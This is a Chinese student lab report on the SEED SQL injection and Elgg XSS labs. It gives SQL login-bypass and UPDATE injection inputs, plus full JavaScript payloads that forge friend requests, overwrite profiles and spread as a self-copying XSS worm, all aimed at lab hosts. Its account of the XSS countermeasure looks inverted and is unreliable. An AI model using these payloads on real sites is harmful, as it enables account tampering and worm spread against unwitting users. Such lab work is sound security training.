一、实践内容
一、SEED SQL注入攻击与防御实验
1、熟悉SQL语句: 我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。
2、对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。
3、对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
4、SQL对抗:修复上述SQL注入攻击漏洞。
二、SEED XSS跨站脚本攻击实验(Elgg)
1、发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。
2、弹窗显示cookie信息:将cookie信息显示。
3、窃取受害者的cookies:将cookie发送给攻击者。
4、成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。
5、修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。
6、编写XSS蠕虫。
7、对抗XSS攻击。
二、实验过程
实践一SEED SQL注入攻击与防御实验
更改名字
打开数据库并使用root进行登录
启动mysql,输入命令mysql -u root -p,输入密码seedubuntu
输入查看所有数据库指令:show databases;
输入使用数据库指令:use Users;
查看数据库中的表,可以看到数据库中有credential表:show tables;
输入查看此表的内容,可以看到员工各项信息select * from credential;
输入查看Alice的相关信息select * from credential where Name=‘Alice’;
在自带的火狐浏览器中打开http://www.seedlabsqlinjection.com/网址,这里出现了一个登录界面
对SELECT语句的SQL注入攻击过程
ctrl+U查看网页源代码,可以看到行校验的是unsafe_home.php:
输入vim /var/www/SQLInjection/unsafe_home.php 打开unsafe_home.php文件,当用户名是admin时,用户信息表名为credential:
密码是被哈希过的hashed_pwd,所以不知道密码的情况下,我们无法通过查询到的hashed_pwd进行登录
使用sql注入的漏洞,输入用户名Admin’#,密码
登陆成功!对selecrt语句的SQL注入攻击成功。
对UPDATE语句的SQL注入攻击
通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。点击Edit Profile,发现只能修改以下内容:
使用vim /var/www/SQLInjection/unsafe_edit_backend.php命令查看unsafe_edit_backend.php文件的源代码,检查Update SQL语句的内容,可以看到内容如下:
进行SQL注入攻击,构造 ', Salary=‘20232819’ where name=‘Admin’; #,对Admin的Salary进行修改。
再次登录看到Admin的Salary已经改为20232819
实践二、SEED XSS跨站脚本攻击实验(Elgg)
1、显示警报窗口
浏览器中进入www.xsslabelgg.com网页,输入用户名Alice,密码seedalice,进行登录:
点击头像下面的Edit prolife,进入界面,在Brief description中输入,然后保存:
查看当前SeedUbuntu的IP
为192.168.200.2,因此,我们构造以下代码:
输入以下命令监听端口500,然后用Alice访问Boby后,从而获取到了cookies
按下ctrl+shift+E,打开开发者工具,然后切换到Network选项卡。点击add friend添加boby为朋友得到URL:
进入Alice的edit profile,找到about me,把代码放到Alice的 About me 下并选择 Edit HTML 模式,输入以下代码,点击保存
<script type="text/javascript">
window.onload = function () {
var Ajax=null;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;
Ajax=new XMLHttpRequest();
Ajax.open("GET",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
Ajax.send();
}
</script>
登录Alice的主页,发现已经和Boby成为好友
构造XSS攻击代码,如下,复制到about me中,然后保存:
<script type="text/javascript">
window.onload = function(){
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
var content= token + ts + "name=" + userName + "&description=<p>20232819ZHX</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
alert(content)
var samyGuid=44;
if(elgg.session.user.guid!=samyGuid)
{
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>
登录boby的账号
访问alice后成为朋友
编写XSS蠕虫
构造蠕虫代码,如下:
<script id="worm" type="text/javascript">
window.onload = function(){
var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
var jsCode = document.getElementById("worm").innerHTML;
var tailTag = "</" + "script>";
var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
var content= token + ts + "&name=" + userName + "&description=<p>20232819ZHX"+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
alert(content)
var samyGuid=44;
if(elgg.session.user.guid!=samyGuid)
{
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>
登录用户名Admin,密码seedelgg,进入Admin主页,打开Account-Administration-plugins,找到 HTMLawed ,关闭,即设为 Deactivate 状态:
登录Boby的账号,发现XSS蠕虫攻击失效:
三、遇到的问题
问题一:不能复制代码
解决一:,采用VM Tools 或者手打输入
四、实验收获
学习了SQL注入、Web渗透、XSS攻击有了初步的了解